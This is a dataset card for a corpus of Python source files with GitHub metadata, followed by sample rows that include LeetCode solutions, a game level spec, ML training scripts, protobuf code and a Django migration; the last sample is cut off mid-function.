Dataset schema (⌀ marks nullable columns):

| column | dtype | lengths / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M, nullable |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1 to 132 |
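The column statistics above follow the Hugging Face dataset-viewer conventions (string/sequence length ranges, class counts, and ⌀ for nullable fields). Below is a minimal sketch of how such a split could be read, assuming this card describes a Hugging Face dataset; `"<dataset-id>"` is a placeholder rather than the real identifier, and streaming is just one option for avoiding a full download.

```python
# Hypothetical usage sketch: "<dataset-id>" is a placeholder for the actual dataset name,
# which this card does not state. Column names match the schema table above.
from datasets import load_dataset

ds = load_dataset("<dataset-id>", split="train", streaming=True)

for row in ds.take(3):
    # Each row pairs repository/commit metadata with one source file in `content`.
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
    print(row["content"][:200])  # first 200 characters of the file
```

The raw sample rows below list these fields in the same order, separated by `|`.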
0a6d677d3bfe4d9fc3186df61d42fd1449051a94 | cb0e7d6493b23e870aa625eb362384a10f5ee657 | /solutions/python3/0239.py | 9306b2072110eb6570e723b0a84bc6ed856cb9dd | [] | no_license | sweetpand/LeetCode-1 | 0acfa603af254a3350d457803449a91322f2d1a7 | 65f4ef26cb8b2db0b4bf8c42bfdc76421b479f94 | refs/heads/master | 2022-11-14T07:01:42.502172 | 2020-07-12T12:25:56 | 2020-07-12T12:25:56 | 279,088,171 | 1 | 0 | null | 2020-07-12T15:03:20 | 2020-07-12T15:03:19 | null | UTF-8 | Python | false | false | 530 | py | class Solution:
def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:
ans = []
decreasingQueue = collections.deque()
for i, num in enumerate(nums):
while decreasingQueue and num > decreasingQueue[-1]:
decreasingQueue.pop()
decreasingQueue.append(num)
if i >= k - 1:
ans.append(decreasingQueue[0])
if nums[i - k + 1] == decreasingQueue[0]:
decreasingQueue.popleft()
return ans
| [
"[email protected]"
] | |
8e725276edde728b56862510da106778c1da2780 | 7f57c12349eb4046c40c48acb35b0f0a51a344f6 | /2017/002_AddTwoNumbers_v1.py | 1ea044ab8f4b389954d82f3afbf3dffdd586c7d5 | [] | no_license | everbird/leetcode-py | 0a1135952a93b93c02dcb9766a45e481337f1131 | b093920748012cddb77258b1900c6c177579bff8 | refs/heads/master | 2022-12-13T07:53:31.895212 | 2022-12-10T00:48:39 | 2022-12-10T00:48:39 | 11,116,752 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #!/usr/bin/env python
# encoding: utf-8
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @param {ListNode} l1
# @param {ListNode} l2
# @return {ListNode}
def addTwoNumbers(self, l1, l2):
head = p = None
carry = 0
while l1 or l2:
l1_val = l1.val if l1 else 0
l2_val = l2.val if l2 else 0
r = l1_val + l2_val + carry
if r >= 10:
carry = r // 10
r = r % 10
else:
carry = 0
if not p:
head = p = ListNode(r)
else:
p.next = ListNode(r)
p = p.next
if l1:
l1 = l1.next
if l2:
l2 = l2.next
if carry:
p.next = ListNode(1)
return head
def print_list(list_head):
print_l(list_head)
print '\n'
def print_l(list_head):
if list_head:
print list_head.val,
print_l(list_head.next)
if __name__ == '__main__':
l1a = ListNode(2)
l1b = ListNode(4)
l1c = ListNode(3)
l1a.next = l1b
l1b.next = l1c
l1 = l1a
l2a = ListNode(5)
l2b = ListNode(6)
l2c = ListNode(4)
l2a.next = l2b
l2b.next = l2c
l2 = l2a
s = Solution()
lr = s.addTwoNumbers(l1, l2)
print_list(l1)
print_list(l2)
print_list(lr)
print '>>>>>>'
l1a = ListNode(5)
l1 = l1a
l2a = ListNode(5)
l2 = l2a
s = Solution()
lr = s.addTwoNumbers(l1, l2)
print_list(l1)
print_list(l2)
print_list(lr)
| [
"[email protected]"
] | |
47fc7609c7840f44a8a36732191723aaed6399c9 | 45c170fb0673deece06f3055979ece25c3210380 | /toontown/coghq/BossbotCountryClubKartRoom_Battle00.py | 6209ace14272197b5d427ec788369610888baf8c | [] | no_license | MTTPAM/PublicRelease | 5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f | 825f562d5021c65d40115d64523bb850feff6a98 | refs/heads/master | 2021-07-24T09:48:32.607518 | 2018-11-13T03:17:53 | 2018-11-13T03:17:53 | 119,129,731 | 2 | 6 | null | 2018-11-07T22:10:10 | 2018-01-27T03:43:39 | Python | UTF-8 | Python | false | false | 1,780 | py | #Embedded file name: toontown.coghq.BossbotCountryClubKartRoom_Battle00
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotKartBoardingRm',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110400: {'type': 'battleBlocker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(4, 0, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1),
'cellId': 0,
'radius': 10},
110000: {'type': 'elevatorMarker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(26.854, 0, 0),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1, 1, 1),
'modelPath': 0},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110401: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(101.07, 0, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| [
"[email protected]"
] | |
d8194a910febb338161234dd2ca1b0ca28446a04 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03129/s416237729.py | 26351727aeb63985e21352d846400af1977248dc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | n,k = input().split()
n = int(n)
k = int(k)
for l in range(k):
l = 2*l +1
c = l
if c <= n:
print('YES')
else:
print('NO') | [
"[email protected]"
] | |
373acc2bcb313e92d96b6a0047fef866c1c722f7 | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/scratch/code2023/namespace.py | 99715efdf2a7cd185fc763fdba1aab4033c39f8a | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 5,654 | py | import logging
import os
from tensorflow.python.ops.summary_ops_v2 import create_file_writer
import trainer_v2.per_project.transparency.mmp.probe.probe_common
from cpath import output_path
from misc_lib import path_join
from trainer_v2.custom_loop.modeling_common.adam_decay import AdamWeightDecay
from trainer_v2.custom_loop.modeling_common.tf_helper import distribute_dataset
from trainer_v2.train_util.get_tpu_strategy import get_strategy2
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
from trainer_v2.chair_logging import c_log, IgnoreFilter, IgnoreFilterRE
import tensorflow as tf
from cpath import get_bert_config_path
from taskman_client.wrapper3 import report_run3
from trainer_v2.custom_loop.prediction_trainer import ModelV2IF, ModelV3IF
from trainer_v2.custom_loop.run_config2 import RunConfig2, get_run_config2
from trainer_v2.per_project.transparency.mmp.tt_model.model_conf_defs import InputShapeConfigTT, InputShapeConfigTT100_4
from trainer_v2.train_util.arg_flags import flags_parser
class LinearV3:
def __init__(self):
x = tf.keras.layers.Input(shape=(2,), dtype=tf.int32, name="x")
x_f = tf.cast(x, tf.float32)
y = tf.keras.layers.Dense(1)(x_f)
inputs = [x,]
output = {'pred': y}
self.model = tf.keras.models.Model(inputs=inputs, outputs=output)
def get_metrics(self) :
output_d = {}
metric = ProbeMAE("mae")
output_d["mae2"] = metric
return output_d
Metric = trainer_v2.per_project.transparency.mmp.probe.probe_common.Metric
class ProbeMAE(Metric):
def __init__(self, name, **kwargs):
super(ProbeMAE, self).__init__(name=name, **kwargs)
self.mae = self.add_weight(name='mae', initializer='zeros')
self.count = self.add_weight(name='count', initializer='zeros')
# self.metric_inner = tf.keras.metrics.MeanAbsoluteError()
def update_state(self, output_d, _sample_weight=None):
v = tf.reduce_sum(output_d['pred'])
self.mae.assign_add(v)
self.count.assign_add(1.0)
def result(self):
return self.mae / self.count
def reset_state(self):
self.mae.assign(0.0)
self.count.assign(0.0)
class LinearModel(ModelV3IF):
def __init__(self, input_shape: InputShapeConfigTT):
self.inner_model = None
self.model: tf.keras.models.Model = None
self.loss = None
self.input_shape: InputShapeConfigTT = input_shape
self.log_var = ["loss"]
def build_model(self):
self.inner_model = LinearV3()
def get_keras_model(self) -> tf.keras.models.Model:
return self.inner_model.model
def init_checkpoint(self, init_checkpoint):
pass
def get_train_metrics(self):
return {}
def get_train_metrics_for_summary(self):
return self.inner_model.get_metrics()
def get_loss_fn(self):
def get_loss(d):
return tf.reduce_sum(d['pred'])
return get_loss
@report_run3
def main(args):
c_log.info(__file__)
run_config: RunConfig2 = get_run_config2(args)
run_config.print_info()
input_shape = InputShapeConfigTT100_4()
model_v2 = LinearModel(input_shape)
optimizer = AdamWeightDecay(
learning_rate=1e-3,
exclude_from_weight_decay=[]
)
def build_dataset(input_files, is_for_training):
def generator():
for _ in range(100):
yield [0., 0.]
train_dataset = tf.data.Dataset.from_generator(
generator,
output_types=(tf.float32),
output_shapes=(tf.TensorShape([2])))
return train_dataset.batch(2)
strategy = get_strategy2(False, "")
train_dataset = build_dataset(run_config.dataset_config.train_files_path, True)
eval_dataset = build_dataset(run_config.dataset_config.eval_files_path, False)
dist_train_dataset = distribute_dataset(strategy, train_dataset)
eval_batches = distribute_dataset(strategy, eval_dataset)
train_log_dir = path_join(output_path, "train_log")
step_idx = 0
with strategy.scope():
model_v2.build_model()
train_summary_writer = create_file_writer(train_log_dir, name="train")
train_summary_writer.set_as_default()
train_metrics = model_v2.get_train_metrics_for_summary()
def train_step(item):
model = model_v2.get_keras_model()
with tf.GradientTape() as tape:
output_d = model(item, training=True)
step = optimizer.iterations
for name, metric in train_metrics.items():
metric.update_state(output_d)
sc = tf.summary.scalar(name, metric.result(), step=step)
print(sc)
return tf.constant(0.0)
@tf.function
def distributed_train_step(train_itr, steps_per_execution):
# try:
total_loss = 0.0
n_step = 0.
for _ in tf.range(steps_per_execution):
batch_item = next(train_itr)
per_replica_losses = strategy.run(train_step, args=(batch_item, ))
loss = strategy.reduce(
tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None)
total_loss += loss
n_step += 1.
train_loss = total_loss / n_step
return train_loss
train_itr = iter(dist_train_dataset)
for m in train_metrics.values():
m.reset_state()
train_loss = distributed_train_step(train_itr, 1)
step_idx += 1
if __name__ == "__main__":
args = flags_parser.parse_args(sys.argv[1:])
main(args)
| [
"[email protected]"
] | |
777ffbf266467e0ceb8a71bb70445652547f6406 | cad91ae76d2746a6c28ddda0f33a58f9d461378f | /PyTorch/Forecasting/TFT/triton/runner/maintainer/docker/containers/__init__.py | cef46b3b10a7504c38e16e3ddf806649f598489b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | NVIDIA/DeepLearningExamples | fe677521e7e2a16e3cb0b77e358f9aab72f8c11a | a5388a45f71a949639b35cc5b990bd130d2d8164 | refs/heads/master | 2023-08-31T20:57:08.798455 | 2023-08-23T10:09:12 | 2023-08-23T10:09:12 | 131,881,622 | 11,838 | 3,124 | null | 2023-08-28T16:57:33 | 2018-05-02T17:04:05 | Jupyter Notebook | UTF-8 | Python | false | false | 673 | py | # Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .triton_server_container import TritonServerContainer
| [
"[email protected]"
] | |
6cedc11b21eb576d025e57da6ccc3febbc2bb6c4 | d2c80cd70f3220165c7add7ed9a103c0ed1ab871 | /python/HOMEWORK/5th_Session/Answers/Class/1/1.py | 37d69bb2650fbd94bf752634ed7bc727c291f579 | [] | no_license | nervaishere/DashTeam | 2a786af8a871200d7facfa3701a07f97230b706e | a57b34a601f74b06a7be59f2bfe503cbd2a6c15f | refs/heads/master | 2023-08-24T12:24:18.081164 | 2021-10-09T21:10:54 | 2021-10-09T21:10:54 | 393,689,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | a=int(input("enter your first number:" ))
b=int(input("enter your second number:" ))
c=int(input("enter your third number:" ))
maximum=max(a,b,c)
minimum=min(a,b,c)
if a==maximum and b==minimum:
print(a, c, b)
elif a==maximum and c==minimum:
print(a, b, c)
elif b==maximum and a==minimum:
print(b, c, a)
elif b==maximum and c==minimum:
print(b, a, c)
elif c==maximum and a==minimum:
print(c, b, a)
elif c==maximum and b==minimum:
print(c, a , b) | [
"[email protected]"
] | |
86afd457c842b29e419998349f8353c18483ab10 | 54ab0f79f5d68f4732ca7d205f72ecef99862303 | /benchmarks/distributed/rpc/parameter_server/metrics/ProcessedMetricsPrinter.py | 7ff8c3171a83336b367299649c37b08f416d7ca2 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | csarofeen/pytorch | a9dd0f8ffa0642d72df2d5e109a8b4d9c2389cbc | e8557ec5e064608577f81e51ccfe7c36c917cb0f | refs/heads/devel | 2023-04-30T02:42:13.558738 | 2023-03-14T00:50:01 | 2023-03-14T00:50:01 | 88,071,101 | 35 | 10 | NOASSERTION | 2023-06-21T17:37:30 | 2017-04-12T16:02:31 | C++ | UTF-8 | Python | false | false | 3,206 | py | import statistics
import pandas as pd
from tabulate import tabulate
class ProcessedMetricsPrinter:
def print_data_frame(self, name, processed_metrics):
print(f"metrics for {name}")
data_frame = self.get_data_frame(processed_metrics)
print(tabulate(data_frame, showindex=False, headers=data_frame.columns, tablefmt="grid"))
def combine_processed_metrics(self, processed_metrics_list):
r"""
A method that merges the value arrays of the keys in the dictionary
of processed metrics.
Args:
processed_metrics_list (list): a list containing dictionaries with
recorded metrics as keys, and the values are lists of elapsed times.
Returns::
A merged dictionary that is created from the list of dictionaries passed
into the method.
Examples::
>>> instance = ProcessedMetricsPrinter()
>>> dict_1 = trainer1.get_processed_metrics()
>>> dict_2 = trainer2.get_processed_metrics()
>>> print(dict_1)
{
"forward_metric_type,forward_pass" : [.0429, .0888]
}
>>> print(dict_2)
{
"forward_metric_type,forward_pass" : [.0111, .0222]
}
>>> processed_metrics_list = [dict_1, dict_2]
>>> result = instance.combine_processed_metrics(processed_metrics_list)
>>> print(result)
{
"forward_metric_type,forward_pass" : [.0429, .0888, .0111, .0222]
}
"""
processed_metric_totals = {}
for processed_metrics in processed_metrics_list:
for metric_name, values in processed_metrics.items():
if metric_name not in processed_metric_totals:
processed_metric_totals[metric_name] = []
processed_metric_totals[metric_name] += values
return processed_metric_totals
def get_data_frame(self, processed_metrics):
df = pd.DataFrame(
columns=['name', 'min', 'max', 'mean', 'variance', 'stdev']
)
for metric_name in sorted(processed_metrics.keys()):
values = processed_metrics[metric_name]
row = {
"name": metric_name,
"min": min(values),
"max": max(values),
"mean": statistics.mean(values),
"variance": statistics.variance(values),
"stdev": statistics.stdev(values)
}
df = df.append(row, ignore_index=True)
return df
def print_metrics(self, name, rank_metrics_list):
if rank_metrics_list:
metrics_list = []
for rank, metric in rank_metrics_list:
self.print_data_frame(f"{name}={rank}", metric)
metrics_list.append(metric)
combined_metrics = self.combine_processed_metrics(metrics_list)
self.print_data_frame(f"all {name}", combined_metrics)
def save_to_file(self, data_frame, file_name):
file_name = f"data_frames/{file_name}.csv"
data_frame.to_csv(file_name, encoding='utf-8', index=False)
| [
"[email protected]"
] | |
64a2f6689e74b94b8ed76e6cae0bed317078440b | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/204509/kaggle-liberty-mutual-group-master/code/correlation.py | b6f3c6e3fd83c3c6656f2ae5fe14cd5de6b86512 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
"""
simple code to calculate Pearson correlation between two results
"""
import pandas as pd
import numpy as np
print('Reading data...')
xgb1 = pd.read_csv("../output/xgboost_1.csv")
xgb2 = pd.read_csv("../output/xgboost_2.csv")
rf = pd.read_csv("../output/rf.csv")
gbm = pd.read_csv("../output/gbm.csv")
print(('Pearson correlation = ', np.corrcoef(gbm.Hazard, rf.Hazard)[0,1])) | [
"[email protected]"
] | |
7461637d40a3096ec3e12766fc5d9198b8cb2fdb | 3e4bb5b4036a66d25a72793c1deaa4f5572d37bf | /apps/pyvcal/tests/independent/revision.py | 8c3bae6df8ddd6187220622f0a6e5e8f2e1e65fd | [
"MIT"
] | permissive | hbussell/pinax-tracker | f7f7eb0676d01251d7d8832557be14665755844d | 4f6538324b2e1f7a8b14c346104d2f1bd8e1556b | refs/heads/master | 2021-01-20T12:06:29.630850 | 2010-02-03T00:39:05 | 2010-02-03T00:39:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,092 | py | import modulespecific
import unittest
class TestRevision(modulespecific.ModuleSpecificTestCase):
"""Test the Revision interface."""
def setUp(self):
"""Create and connect to a repository."""
self.basic_repo = self.test_module.BasicRepository()
self.repo = self.basic_repo.repo()
"""Get the latest revision from that repository."""
self.revisions = self.repo.revisions
self.head = self.repo.branches[""].head
def tearDown(self):
"""Destroy the created repository."""
self.basic_repo.teardown()
class TestRevisionPredecessors(TestRevision):
"""Test Revision.predecessors"""
def runTest(self):
"""Test that the latest revision returns the expected predecessor i.e: Revision(rev_num - 1)."""
# PROBLEM: This test fails (at least on git) because there is only ONE
# revision in the test repo, therefore self.head.properties.time is equal
# to predecessors[0].properties.time
predecessors = self.head.predecessors
self.assertEquals(1, len(predecessors))
self.assert_(self.head.properties.time > predecessors[0].properties.time)
self.assertEquals(predecessors[0].properties.commit_message, "Rename README.txt to README")
class TestRevisionGetProperties(TestRevision):
"""Test Revision.properties"""
def runTest(self):
"""Test that the 'basic' test Revision.properties returns a non-null properties object."""
props = self.head.properties
self.assert_(props)
self.assert_(props.committer)
self.assert_(props.time)
self.assert_(props.commit_message)
class TestRevisionDiffWithParents(TestRevision):
"""Test Revision.diff_with_parents"""
def runTest(self):
"""Test the get diff with parents returns a valid RevisionDiff object."""
diff = self.head.diff_with_parent
diff_value = diff.value
self.assertEquals("", diff_value)
#TODO need a better test... base on branch_and_merge test repo
| [
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5d074a0b8bca96ac9ec808db99922c922dfe31a1 | bc441bb06b8948288f110af63feda4e798f30225 | /monitor_sdk/model/flowable_service/process_instance_pb2.py | 4138e633ea17940cb65e4ffd486693a240303547 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 6,546 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: process_instance.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='process_instance.proto',
package='flowable_service',
syntax='proto3',
serialized_options=_b('ZJgo.easyops.local/contracts/protorepo-models/easyops/model/flowable_service'),
serialized_pb=_b('\n\x16process_instance.proto\x12\x10\x66lowable_service\"\xdc\x01\n\x0fProcessInstance\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x1a\n\x12\x66lowableInstanceId\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x0f\n\x07\x63reator\x18\x04 \x01(\t\x12\r\n\x05\x63time\x18\x05 \x01(\t\x12\r\n\x05\x65time\x18\x06 \x01(\t\x12\x0e\n\x06status\x18\x07 \x01(\t\x12\x12\n\nstepIdList\x18\x08 \x03(\t\x12\x0e\n\x06stopAt\x18\t \x01(\t\x12\x13\n\x0bisSuspended\x18\n \x01(\x08\x12\x13\n\x0bisCancelled\x18\x0b \x01(\x08\x42LZJgo.easyops.local/contracts/protorepo-models/easyops/model/flowable_serviceb\x06proto3')
)
_PROCESSINSTANCE = _descriptor.Descriptor(
name='ProcessInstance',
full_name='flowable_service.ProcessInstance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='flowable_service.ProcessInstance.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flowableInstanceId', full_name='flowable_service.ProcessInstance.flowableInstanceId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='flowable_service.ProcessInstance.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='flowable_service.ProcessInstance.creator', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ctime', full_name='flowable_service.ProcessInstance.ctime', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='etime', full_name='flowable_service.ProcessInstance.etime', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='flowable_service.ProcessInstance.status', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='stepIdList', full_name='flowable_service.ProcessInstance.stepIdList', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='stopAt', full_name='flowable_service.ProcessInstance.stopAt', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isSuspended', full_name='flowable_service.ProcessInstance.isSuspended', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCancelled', full_name='flowable_service.ProcessInstance.isCancelled', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=45,
serialized_end=265,
)
DESCRIPTOR.message_types_by_name['ProcessInstance'] = _PROCESSINSTANCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ProcessInstance = _reflection.GeneratedProtocolMessageType('ProcessInstance', (_message.Message,), {
'DESCRIPTOR' : _PROCESSINSTANCE,
'__module__' : 'process_instance_pb2'
# @@protoc_insertion_point(class_scope:flowable_service.ProcessInstance)
})
_sym_db.RegisterMessage(ProcessInstance)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
e1777a1bf88087f70635240d8c7855eca9233d1a | cb35fffaab9650a8b89019a0269ad7cdf772f757 | /news/migrations/0001_initial.py | 849f2c75fec1aa5d94778cd7ca1fc5ab0994583d | [] | no_license | amazing22/my-second-blog | 6c75dddae2650269805edfa9c0f2b89ba6f1db48 | a5cc02663badcbb2efcaf6d291a634edbdb8a009 | refs/heads/master | 2021-08-08T03:19:58.404245 | 2017-11-09T12:32:22 | 2017-11-09T12:32:22 | 102,439,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,180 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-11 05:06
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateField()),
('headline', models.CharField(max_length=200)),
('content', models.TextField()),
],
),
migrations.CreateModel(
name='Reporter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(max_length=70)),
],
),
migrations.AddField(
model_name='article',
name='reporter',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.Reporter'),
),
]
| [
"[email protected]"
] | |
abb40f6104d91f9d09907f53c15d22b40b43d962 | 6f1e1c378997bf76942ce6e203e720035169ce27 | /104-maximum-depth-of-binary-tree.py | 7c47b2cce48c405645fdc77aba59813e9127047c | [
"MIT"
] | permissive | yuenliou/leetcode | a489b0986b70b55f29d06c2fd7545294ba6e7ee5 | e8a1c6cae6547cbcb6e8494be6df685f3e7c837c | refs/heads/main | 2021-06-16T07:47:39.103445 | 2021-05-11T09:16:15 | 2021-05-11T09:16:15 | 306,536,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | #!/usr/local/bin/python3.7
# -*- coding: utf-8 -*-
from collections import deque
from datatype.tree_node import TreeNode
class Solution:
def maxDepth(self, root: TreeNode) -> int:
"""dfs"""
if not root:
return 0
else:
l = self.maxDepth(root.left)
r = self.maxDepth(root.right)
# return l + 1 if l > r else r + 1
return max(l, r) + 1
def maxDepth2(self, root: TreeNode) -> int:
"""bfs"""
if not root: return 0
cnt = 0
queue = deque()
queue.append(root)
while len(queue): # isEmpty()
temp = []
# cnt = len(queue); while cnt: ...; cnt -= 1
